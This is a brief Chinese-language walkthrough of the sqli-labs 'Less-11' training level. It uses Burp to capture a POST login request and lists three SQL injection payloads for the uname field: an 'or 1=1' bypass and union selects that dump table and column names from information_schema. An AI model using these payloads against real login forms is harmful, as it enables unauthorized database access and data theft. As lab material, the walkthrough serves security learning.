Basic Injection
Less-11 Error Based-String
这里是用的post传递参数,所以在url上不会显示数据了,使用burp进行抓包来注入
确认注入点
uname=1' or 1=1 --+
直接爆表
uname=1' union select database(),group_concat(table_name) from information_schema.tables where table_schema="security" --+
爆字段
uname=1' union select database(),group_concat(column_name) from information_schema.columns where table_name='users' --+
</